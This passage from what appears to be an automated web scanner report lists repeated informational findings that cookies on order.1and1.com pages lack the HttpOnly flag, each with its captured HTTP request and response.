Date: Sun, 20 Mar 2011 18:44:04 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5729a5342aeda400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureToolsRatepoint;jsessionid=8B5621B53D25F04D97E2041EE345559D.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.97. http://order.1and1.com/xml/order/FeatureToolsRatepoint

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureToolsRatepoint

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureToolsRatepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:10 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=wZlsrLi8lTmVlX3JobzVtZzQmMGlcVi5FODIaHhsbMS8xLywsLy4oKy8iJCMiH0QyXlNVYxs0L184YnE3KisnJisnJSgmICgfHidfYD0yOWlyOCssKCcsKSYpJCcoISI=; Expires=Fri, 07-Apr-2079 21:58:17 GMT; Path=/
ETag: 340c020f5116b3d57c2a93a405b0dc63
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19172


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.98. http://order.1and1.com/xml/order/FeatureWebdesignIstock

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebdesignIstock

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureWebdesignIstock HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:07 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3348408536a8e000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureWebdesignIstock;jsessionid=B11825444DE6AF404D3894B75D9B481A.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.99. http://order.1and1.com/xml/order/FeatureWebdesignIstock

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebdesignIstock

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureWebdesignIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:12 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:57:19 GMT; Path=/
ETag: d06c6bfe7230ad5806d756546ea8b599
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17838


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.100. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureWebspaceExplorer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:01 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=41597db82a3d3000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureWebspaceExplorer;jsessionid=93C56191AF30E78D44536F920C59ACBA.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.101. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:11 GMT; Path=/
ETag: 1bb8645f85cd004134e2d01fcda6ff8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17511


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.102. http://order.1and1.com/xml/order/FirstWebsite

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FirstWebsite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FirstWebsite;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:37 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=IdGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:51:45 GMT; Path=/
ETag: 2ed917d161c42e4fa75c784c5b6b5cf6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18487


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.103. http://order.1and1.com/xml/order/FirstWebsite

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FirstWebsite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FirstWebsite HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:34 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=721928ff566a0c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FirstWebsite;jsessionid=62AF947873737195114E013CF73D4E5F.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.104. http://order.1and1.com/xml/order/Gtc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:36:23 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 21:50:31 GMT; Path=/
ETag: c62c440b7a62cc8bf42d3668ecde986c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 119564


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.105. http://order.1and1.com/xml/order/Gtc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Gtc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:36:18 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5329a8951a3be400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Gtc;jsessionid=95BD9426A31E329257071B4E6CB7E89F.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.106. http://order.1and1.com/xml/order/Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Home HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=eshopupselling; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:11:AAABLtRYZ*3Z0AoL3q_g3EClOijRS1_a:1300642686957; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:38:02 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3c94c49b88c62400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Home;jsessionid=88C0CA51C2D94DE8253D95249E3E6457.TCpfix142a
Content-Length: 0
Content-Type: text/plain


5.107. http://order.1and1.com/xml/order/Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.108. http://order.1and1.com/xml/order/Hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Hosting HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:25:22 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=652e051eff6a6c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Hosting;jsessionid=5F1C91FBFCD4C8A93CF8EF891907E981.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.109. http://order.1and1.com/xml/order/Hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
